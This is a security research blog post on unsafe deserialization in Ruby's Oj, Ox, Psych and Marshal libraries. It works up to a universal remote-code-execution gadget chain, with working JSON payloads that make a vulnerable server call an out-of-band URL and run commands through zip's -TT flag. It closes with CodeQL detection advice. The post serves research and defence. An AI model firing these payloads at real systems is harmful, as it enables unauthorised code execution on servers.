Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible? In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects.
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible?
In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. All samples in this blog post are made using the Oj JSON serialization library for Ruby, but that does not mean they are limited to this library. At the end of this blog post, we will link to a repository that contains working sample exploits that work for Oj (JSON), Ox (XML), Psych (YAML), and Marshal (custom binary format), and show you how CodeQL can detect such vulnerabilities. Understanding how unsafe deserialization works can help you avoid this class of bugs in its entirety instead of focusing on avoiding certain methods.
Contents
- Step-by-step: Putting together a detection gadget chain for Oj
- Extending the detection gadget to a full-fledged universal remote code execution chain
- Detecting unsafe deserialization when the source code is available
Step-by-step: Putting together a detection gadget chain for Oj
Many people have an idea of how the exploitation of deserialization vulnerabilities could work. But how does it really work? (It’s part magic and part sweat and tears.) In this section, we show how to build an unsafe deserialization detection gadget for Oj, a Ruby-based JSON deserialization library, that calls an external URL. This detection gadget is based on William Bowling’s (aka vakzz) universal deserialisation gadget for Marshal and Ruby 3.0.3 adapted to Oj and Ruby 3.3.
1. It starts with a class
Most of the time, unsafe deserialization vulnerabilities arise with the capability of a deserialization library to support polymorphism, which implies the ability to instantiate arbitrary classes or class-like structures specified in the serialized data. The attacker then chains those classes together to execute code on the system under exploitation. All used classes must typically be accessible by the exploited project. In this context classes that are useful for a certain purpose such as executing commands or code are called gadgets. Whereas by combining those classes to become part of a bigger exploit (for example, by nesting them) we get a so-called gadget chain. The ability to serialize and deserialize arbitrary constructs was long seen as a powerful feature and it was originally not intended for code execution. In 2015 the public perception of this feature changed with the release of a blog post about widespread Java deserialization vulnerabilities by FoxGlove Security. In 2017 unsafe deserialization attacks against Java and .NET based JSON libraries were presented at BlackHat with the title “Friday the 13th: JSON Attacks”.
When using the (non-default) Ruby library named Oj for deserializing JSON a project is vulnerable by simply having a construct such as:
data = Oj.load(untrusted_json)
The Oj library by default supports the instantiation of classes specified in JSON. It’s possible to disable this behavior by specifying an additional parameter or using Oj.safe_load
instead.
As mentioned in the introduction, unsafe deserialization vulnerabilities are not limited to JSON; they can occur wherever arbitrary classes or class-like structures are deserialized from user-controlled data.
To instantiate a class of name MyClass
with a field called member
with the content value
, following JSON has to be passed to a vulnerable Oj sink.
{
"^o": "MyClass",
"member": "value"
}
2. Now come the maps (hashes), lists, getters, setters, constructors, and more
While the instantiation of classes is the most common denominator for unsafe deserialization vulnerabilities, the next building blocks differ from language to language. While in Java and similar languages unsafe deserialization vulnerabilities sometimes make use of constructors, setters, and getters to initially trigger code execution, we can’t rely on them for Ruby deserialization vulnerabilities. Vakzz’s blog post is about the exploitation of Ruby’s binary Marshal serialization, which relies on a so-called magic method (a method invoked in the reconstruction of the serialized objects) named _load
(similar to Java’s readObject
) to trigger code execution. However, Oj does not invoke this magic method, so in order to trigger the execution of our gadget chain we can’t rely on this method and have to find something else.
To answer the question up front: what can we even use to trigger code execution in Oj?
The hash(code)
method!
Oj is not the only deserialization library where we rely on the hash
method as a kick-off for our gadget chain. The hash
method is typically called on the key object when the deserialization library adds a key-value pair to a hashmap (simply called a hash itself in Ruby).
This table shows the kick-off methods for the popular serialization libraries in Ruby:
Library | Input data | Kick-off method inside class |
Marshal (Ruby) | Binary | _load |
Oj | JSON | hash (class needs to be put into hash(map) as key) |
Ox | XML | hash (class needs to be put into hash(map) as key) |
Psych (Ruby) | YAML | hash (class needs to be put into hash(map) as key)init_with |
JSON (Ruby) | JSON | json_create ([see notes regarding json_create at end](#table-vulnerable-sinks)) |
Let’s create a small proof of concept to demonstrate kicking off our gadget chain with the hash
method.
We assume that we have a class, such as the one following, available in the targeted Ruby project (hint: there won’t be such a gadget in real-world projects):
class SimpleClass
def initialize(cmd)
@cmd = cmd
end
def hash
system(@cmd)
end
end
A call to “hash” would execute the command in the “@cmd” member variable using “system.”Note that in the Oj deserialization process the constructor isn’t executed. Here, we use it to create a quick sample payload ourselves and dump the resulting JSON:
require 'oj'
simple = SimpleClass.new("open -a calculator") # command for macOS
json_payload = Oj.dump(simple)
puts json_payload
Note: while it might make sense to directly serialize single gadgets, serializing or even just debugging a whole gadget chain is typically dangerous as it might trigger the execution of the chain during the serialization process (which won’t give you the expected result, but you’ll “exploit” your own system). |
The payload JSON looks like this:
{
"^o": "SimpleClass",
"cmd": "open -a calculator"
}
If we now load this JSON with Oj.load
nothing happens. Why? Because nobody actually calls the hash method.
data = Oj.load(json_payload)
So, no calculator for now.
But now the question is: how do we trigger the hash(code)
method ourselves? We have to put the class we want to instantiate inside of a hash(map) as the key. If we now package our previous payload inside as hash(map) as a key it looks like this in Oj’s serialization format:
The value of the hash(map) entry is left to “any.” Now, the command execution is triggered just by loading the JSON:
Oj.load(json_payload)
Et voilà: we started a calculator.
3. Constructing a payload with gadgets
Now, in reality our targeted project won’t have a “SimpleClass” available that simply executes commands when its hash method is called. No software engineer would develop something like that (I hope 😅).
Sidenote: Java’s URL class performs DNS lookups when hashCode() or equals() are called. 🙈
We are required to use classes that are part of the Ruby project we’re analyzing or its dependencies. Preferably, we’d even want to use classes that are part of Ruby itself, and as such, are always available. How to find such classes is described in Elttam’s blog post from 2018 and in vakzz’s blog post from 2022.
We are now focusing on porting vakzz’s universal gadget chain for Marshal from 2022 to Oj and Ruby 3.3. The hard work of creating a working gadget chain has been mostly performed by vakzz; we reuse most of the parts here to assemble a gadget chain that works in recent versions of Ruby and in other deserialization libraries. The goal is to have a gadget chain that is able to call an arbitrary URL. Namely, we’re interested in getting a callback to our server to prove our ability to execute code (hopefully) without causing any further damage.
Disclaimer: this doesn’t mean that this detection gadget chain is harmless. Only use this against your own systems or systems where you have a written permission to do so.
Now, vakzz’s gadget chain relied on the kick-off with a call to to_s
(toString). to_s
was triggered inside of the _load
method of specification.rb. _load
is a method that is triggered when an object is deserialized with Marshall. The Oj deserializer does not make use of _load
or a similar method.
The rough instantiation process of a class as performed by Oj is as follows:
- Instantiate a class mantle (without calling a constructor).
- Fill class fields directly (without calling setters).
So, this normal deserialization process doesn’t trigger code execution by itself. But from the simple example above we know we can make calls to hash
. For now, this has to be enough.
We now have learned that:
- We can trigger the
hash
method on an arbitrary class (kick-off gadget). - We must call the
to_s
method on an internal member.
=> We have to find a bridge between the two:
For this process, you can use a tool such as CodeQL and write a custom query that you run on the ruby/ruby codebase. After some querying, I’ve found a bridge in a class I’ve encountered before: the Requirement class. Its hash method indeed has a call to to_s
;
def hash # :nodoc:
requirements.map {|r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash
end
At first, this might look a bit complicated for people who are not familiar with Ruby. So, we will break down the requirements for callingto_s
on the inner gadget here:
- We need an array of
requirements
that can be transformed by using the map function. - Inside this array we need another array, whose first element (
r[0]
) is equal to “~>”. - If we then place our next gadget inside of the second element (
r[1]
) the to_s method will be called on it!
Expressed in JSON this could look like this:
[ ["~>", <INNER_GADGETS> ] ]
We’re now able to bridge a call from hash
to to_s
and trigger the rest of the gadget chain.
The following bound of vakzz’s gadget chain is of type Gem::RequestSet::Lockfile
. When to_s
is called on an object of class Lockfile it calls spec_groups
on the same class:
def to_s
out = []
groups = spec_groups
[..]
The method spec_groups
enumerates the return value of the requests
method which returns the sorted_requests
field of a RequestSet
. (Note that in Ruby versions before 3.3 this field was called sorted
.)
What might be not obvious to people not familiar with Ruby is that the statement requests
actually calls the requests
method.
def spec_groups
requests.group_by {|request| request.spec.class }
end
In the same manner the method spec
is called on the inner class Gem::Resolver::IndexSpecification
while enumerating over the requests. The call to spec
internally leads to a call to fetch_spec
on the type Gem::Source
, which in turn leads to a call of fetcher.fetch_path
with source_uri:
def fetch_spec(name_tuple)
fetcher = Gem::RemoteFetcher.fetcher
spec_file_name = name_tuple.spec_name
source_uri = enforce_trailing_slash(uri) + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"
[..]
source_uri.path << ".rz"
spec = fetcher.fetch_path source_uri
[..]
end
source_uri
itself is built from the internal uri
attribute. This uri
is of type URI::HTTP
. Now, it seems straightforward and one might be inclined to use a normal URI object with a http or https scheme. That would somewhat work, but the resulting URL path would not be completely choosable as the URI is parsed in those cases, making the shenanigans that come next impossible. So, vakzz found a way of using S3 as the scheme for an URI object. In JSON this would look like this:
{
"^o": "URI::HTTP",
"scheme": "s3",
"host": "example.org/anyurl?",
"port": "anyport","path": "/", "user": "anyuser", "password": "anypw"
}
In this sample the scheme of the URL is set to “s3” while the “host” (!) is set to “example.org/anyurl?”.
The uri
attribute has the following content:
One might notice that at least the host and the port look off in this sample.
The complete source_uri
before provided to fetcher.fetch_path
looks like this:
Now, since the scheme of this URI object is s3
, the RemoteFetcher
calls the fetch_s3
method, which signs the URL using the given username and password and creates an HTTPS URI out of it. It then calls fetch_https
.
Here, we notice that the host and port of the URL look normal again. Luckily for us, every other addition was put after the question mark marking the query. So, our targeted URL will be called as we want.
#<URI::HTTPS https://example.org/anyurl?.s3.us-east-1.amazonaws.com/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=anyuser%2F20240412%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240412T120426Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=fd04386806e13500de55a3aec222c2de9094cba7112eb76b4d9912b48145977a>
After fetch_https
was called with our desired URL the code of the Source
class tries to inflate and store the downloaded content. In this detection scenario where our gadget should just call an external URL of our choice (for example, a service like Canarytokens or Burp Collaborator), so that we get a notification when the URL has been called, it is better if the execution of the exploit ends here before extracting and storing the received data.
When we put our detection gadget chain into a vulnerable Oj.load
sink our defined URL is requested using a GET request. This request then looks like this (using Burp’s Collaborator):
=> After our given URL was triggered, we know that we’ve detected a vulnerable application. This technique could also help detect an out-of-band execution of our JSON-based exploit.
(Note that this technique will not work if the targeted system disallows outbound connections or only allows connections to URLs that are part of an allow list.)
The next diagram shows how the gadget chain is triggered with a call to hash
on the Gem::Requirement
class and ends with a call to fetch_path
on the Gem::Source class
:
Extending the detection gadget to a full-fledged universal remote code execution chain
Now that we’ve built a gadget chain for detection we also want to know if a gadget chain leading to remote code execution (RCE) is doable.
The previously mentioned Marshal-based gadget chain from vakzz from April 2022 allowed remote code execution against Ruby 3.0.2 based projects. But this exact approach stopped working somewhere around Ruby 3.2. As mentioned before at least one additional issue came up with Ruby 3.3.
So, we had to work around both to achieve remote code execution with Ruby 3.3.
In short: vakzz’s gadget chain uses the Gem::Source::Git
class to execute commands, namely via the rev-parse
method that is triggered via the add_GIT
method inside of the Gem::RequestSet::Lockfile
class we’ve seen before:
def rev_parse # :nodoc:
hash = nil
Dir.chdir repo_cache_dir do
hash = Gem::Util.popen(@git, "rev-parse", @reference).strip
end
[..]
end
Here, we see that a certain Util.popen
method is called, which itself calls IO.popen
: a classical command injection sink! The popen
method is called with a command from the member variable @git
, followed by a string literal rev-parse
as the first argument and a second member variable named @reference
also under the attacker control. Well, since we know we can likely control those member variables, this looks pretty interesting, right?
Now, there’s at least one problem: the method rev_parse
wants to change the working directory to repo_cache_dir
. And repo_cache_dir is defined as follows:
def repo_cache_dir # :nodoc:
File.join @root_dir, "cache", "bundler", "git", "#{@name}-#{uri_hash}"
end
So, this method joins a directory starting with the member variable @root_dir
then the static folders “cache,” “bundler,”and “git” and then a folder that is a combination of the member variable @name
and uri_hash
. uri_hash
is a longer method, whose function can for our purposes be abbreviated as “the SHA-1 hash of the member variable @repository
.”
All combined repo_cache_dir
will return a path such as:
@root_dir/cache/bundler/git/@name-SHA1(@repository)
So, either we have to know of such a folder on the target system to which we can point to using the three member variables in our control OR we have to create the folder ourselves. Now, knowing of such a folder on the target system might be a bit tricky at least due to the @name + SHA-1 hash combination involved. But how would we create such a folder ourselves?
This need for an existing folder is actually one of the reasons vakzz’s gadget chain uses the first part we use as a detection at all. The previously mentioned fetch_spec
method of the class Gem::Source
executes mkdir_p
on the given cache_dir
in case the fetching and inflating of the given source_uri
succeeded.
def fetch_spec(name_tuple)
[..]
cache_dir = cache_dir source_uri
local_spec = File.join cache_dir, spec_file_name
[..]
spec = fetcher.fetch_path source_uri
spec = Gem::Util.inflate spec
if update_cache?
require "fileutils"
FileUtils.mkdir_p cache_dir
File.open local_spec, "wb" do |io|
io.write spec
end
end
[..]
end
Since the cache_dir
is a combination of cache_dir
and source_uri
and we know that, thanks to the use of the S3 scheme, there are some shenanigans with URLs possible that would otherwise not work. Now, since the file that’s downloaded from source_uri
needs to be inflatable we would change the URI::HTTP
of our previous detection gadget to something like:
{
"^o": "URI::HTTP",
"scheme": "s3",
"host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
"port": "/../../../../../../../../../../../../../tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/
",
"path": "/", "user": "anyuser", "password": "anypw"
}
In this sample we load an existing inflatable file directly from Rubygems.org and make sure that all the folders in the following path exist:
/tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/
The string “a3f72d677b9bbccfbe241d88e98ec483c72ffc95” is the SHA-1 hash of “anyrepo,”which we can use later on for creating the Git object. We know now that we’re able to create a folder that rev-parse
can switch to and execute the command line tool given in the @git
member variable; the original exploit for Marshal used commands were embedded in the deflated .rc file for the command execution.
The execution order of the old exploit chain was roughly:
- Download .rc file containing deflated commands.
- Execute the command
tee rev-parse
with the input stream from an inflated .rc file (the file rev-parse now contains the commands). - Execute the command
sh rev-parse.
However, this full chain stopped working around Ruby 3.2.2 since the strip
method inside rev-parse
now raised an error:
`strip': invalid byte sequence in UTF-8 (Encoding::CompatibilityError)
The challenge
We now have a fun challenge on our hands because we need to find a new way to execute arbitrary commands.
We learned we have following skeleton for executing commands:
<arbitrary-bin> rev-parse <arbitrary-second-argument>
The constraints are as follows:
- The binary to execute and the second argument are freely chosable.
- The first argument is always
rev-parse
. - What is returned from this popen call should be readable as UTF-8 (on Linux) to allow additional executions.
- You can call
popen
as many times as you want with different binary and second argument combinations as long as at max the execution of the last command combinations fails. - Additionally, it’s also possible to pass in a stream as a second argument.
A solution
While there are multiple solutions to this challenge (try it out yourself!) I searched for a solution using GTFOBins. GTFOBins are by their own description:
_“GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.”_
We’re basically looking for a util that can somehow execute commands with its second argument or parameter.
Looking for GTFOBins that are usable for command execution, I settled on the zip
binary as it’s available by default on many different Linux distributions. zip
allows command execution via its -TT
(–unzip-command) flag when the -T
flag is set as well. (Note that zip might work differently under certain macOS versions.)
Now, there are two remaining problems:
- The first argument is always
rev-parse
, but calling-T
-TT
afterwards doesn’t work if there’s no (zip) file namedrev-parse.
- We only control the second argument and cannot add more arguments, but we need both
-T
and-TT
.
We solve the first problem simply by creating a zip file with the name rev-parse
:
(The file we add to the zip doesn’t matter, but we assume that /etc/passwd
exists on typical Unix systems and is world readable.)
zip rev-parse /etc/passwd
The second problem is addressed by putting both flags together separated by m
as the described here:
zip rev-parse -TmTT="$(id>/tmp/anyexec)"
This will execute the id
command and store its output into /tmp/anyexec
.
Putting it all together
To create a gadget chain that is able to execute code we put following pieces in order:
- Download any rc file that can be deflated and triggers the folder creation.
- Execute
zip
to create a zip file called rev-parse. - Execute
zip
a second time to execute an arbitrary command.
The last zip execution looks like this in JSON format:
{
"^o": "Gem::Resolver::SpecSpecification",
"spec": {
"^o": "Gem::Resolver::GitSpecification",
"source": {
"^o": "Gem::Source::Git",
"git": "zip",
"reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
"root_dir": "/tmp",
"repository": "anyrepo",
"name": "anyname"
},
"spec": {
"^o": "Gem::Resolver::Specification",
"name": "name",
"dependencies": []
}
}
}
=> Now, we are able to execute commands (for example, calculators) by feeding a vulnerable application with our JSON.
Here we see the result of our test command. The output of id
has been written to the file /tmp/anyexec.
:
See the full gadget chain in the accompanying repository of this blog post. Using this gadget chain, we can use arbitrary commands on vulnerable projects.
Detecting unsafe deserialization when the source code is available
The previously shown gadget chains allow you to detect instances of unsafe deserialization without having access to the source code of a project. However, if you have access to CodeQL and the source code of a project and want to detect instances of unsafe deserialization, you can utilize CodeQL’s deserialization of user-controlled data query. This query will detect code locations where untrusted data flows to unsafe deserialization sinks. This query is part of GitHub’s code scanning with CodeQL query set for Ruby and results would show up like this in the code scanning section:
If you just want an overview over vulnerable sinks without any flow analysis open the query named UnsafeDeserializationQuery.qll in Visual Studio Code with an installed CodeQL extension and click on “Quick Evaluation: isSink.”
This will return a list of all insecure deserialization sinks inside of your project (a CodeQL database of your project is required). For more information about this methodology see Find all sinks for a specific vulnerability type in part three of the CodeQL zero to hero blog series.
An overview of the different unsafe deserialization sinks in Ruby
The gadget chain shown in this blog post was observed to work up to Ruby 3.3.3 (released in June 2024). A repository was created containing exploits for following deserialization libraries:
- Oj (JSON)
- Ox (XML)
- Ruby YAML/Psych (when used unsafely)
- Ruby Marshal (custom binary format) *
The Marshall version of the gadget chain only works up to Ruby 3.2.4 (released in April 2024).
Here, we list the vulnerable sinks for a manual code review—code scanning/CodeQL from GitHub is already aware of all of these sinks.
Table: Vulnerable sinks
Library | Unsafe Sinks | Input data | Remark |
Oj |
Oj.load (if no safe mode is used) Oj.object_load |
JSON | Safe mode available |
Ox |
Ox.parse_obj Ox.load (if the unsafe object mode is used) |
XML | (un)safe mode available |
Psych (Ruby) | YAML.load (for older Ruby/Psych versions) *, YAML.unsafe_load | YAML | * Since Psych 4.0 no arbitrary Ruby classes are instantiated when YAML.load is used.Ruby 3.1 (released in December 2021) depends on Psych 4.0 by default. |
Marshal (Ruby) | Marshal.load | Binary | Should be avoided as a serialization format. |
JSON (Ruby) | JSON.load ** | JSON | ** Only a limited set of classes that have a json_create method defined can be used. Due to this constraint there seems to exist no gadget chain as part of Ruby or Rails that allows arbitrary code/command execution. |
Conclusion
In this blog post, we showed how an unsafe deserialization vulnerability can be detected and exploited in different ways. If you have access to the source code, the easiest way to detect unsafe deserialization vulnerabilities is to use GitHub code scanning with CodeQL on your repositories. If you want to deep dive into your code, you can use the CodeQL extension for Visual Studio Code for that.
Should you not have access to the source code of a project, you can make use of the detection gadgets we built up step by step in this blog post to detect unsafe deserialization vulnerabilities remotely. (The detection gadget calls a URL you’ve specified). The post also explains how a universal remote code execution (RCE) gadget chain works—that you likely only want to use in lab settings. All gadget chains for the Marshal, YAML, Oj, and Ox deserialization libraries can be found in the accompanying repository.
Tags:
Written by
Related posts
How to secure your GitHub Actions workflows with CodeQL
In the last few months, we secured 75+ GitHub Actions workflows in open source projects, disclosing 90+ different vulnerabilities. Out of this research we produced new support for workflows in CodeQL, empowering you to secure yours.
Announcing CodeQL Community Packs
We are excited to introduce the new CodeQL Community Packs, a comprehensive set of queries and models designed to enhance your code analysis capabilities. These packs are tailored to augment…
Uncovering GStreamer secrets
In this post, I’ll walk you through the vulnerabilities I uncovered in the GStreamer library and how I built a custom fuzzing generator to target MP4 files.